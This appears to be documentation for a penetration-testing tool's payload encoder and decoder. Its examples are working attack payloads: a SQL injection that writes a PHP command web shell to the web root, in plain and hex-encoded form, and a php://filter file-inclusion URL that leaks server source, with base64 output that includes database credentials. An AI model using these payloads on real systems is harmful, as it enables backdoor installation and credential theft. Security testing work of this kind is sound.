Payload Encoder & Decoder Modules
#Payload Encoder and Decoder Modules These modules are used to encode and decode strings mostly. Take for instance you have found an SQL Injection and you need to upload a backdoor via the SQL injection. e.g.
union select 1,2,"<?system($_REQUEST['cmd']);?>",4,5 into outfile '/some/site/web/root/writeable-directory/shell.php'--+This query fails because of all the quotes. to make it easier we can convert the query into hex with 0x prefix format as the DB will understand its hex based on the prefix and avoid passing it as a string. This will also avoid an issue of the query breaking due to the quotes.
##Payload Encoding The process to achieve this is as below:
- Click on Web Utils
- Click on Payload Encoder
- Paste the code in the text area named Plaintext
- Select the encoding type , in our case it's : Hex with 0x Prefix
- Click Encode
If successfull result should be as below:
Your final resulting query will be as below:
union select 1,2, 0x3c3f73797374656d28245f524551554553545b27636d64275d293b3f3e,4,5 into outfile '/some/site/web/root/writeable-directory/shell.php'--+There are many uses for encoding e.g. base64 is used alot in LFI when where the method used to read source files from the server side is php://filter e.g.
http://victim.site/index.php?m=php://filter/convert.base64-encode/resource=index
Returns something similar to below:
PD9waHANCiRzZXJ2ZXJuYW1lID0gImxvY2FsaG9zdCI7DQokdXNlcm5hbWUgPSAicm9vdCI7DQokcGFzc3dvcmQgPSAidmVyeUhhcmRQQHNzdzByZCI7DQokZGJuYW1lID0gIm10aDNsM20zbnQiOw0KDQovLyBDcmVhdGUgY29ubmVjdGlvbg0KJGNvbm4gPSBuZXcgbXlzcWxpKCRzZXJ2ZXJuYW1lLCAkdXNlcm5hbWUsICRwYXNzd29yZCwgJGRibmFtZSk7DQovLyBDaGVjayBjb25uZWN0aW9uDQppZiAoJGNvbm4tPmNvbm5lY3RfZXJyb3IpIHsNCiAgICBkaWUoIkNvbm5lY3Rpb24gZmFpbGVkOiAiIC4gJGNvbm4tPmNvbm5lY3RfZXJyb3IpOw0KfSA= You can decode this using the framework to get the source code.
- Click on Web Utils
- Click on Payload Decoder
- Paste the code in the text area named Plaintext
- Select the encoding type , in our case it's : Base 64
- Click Decode
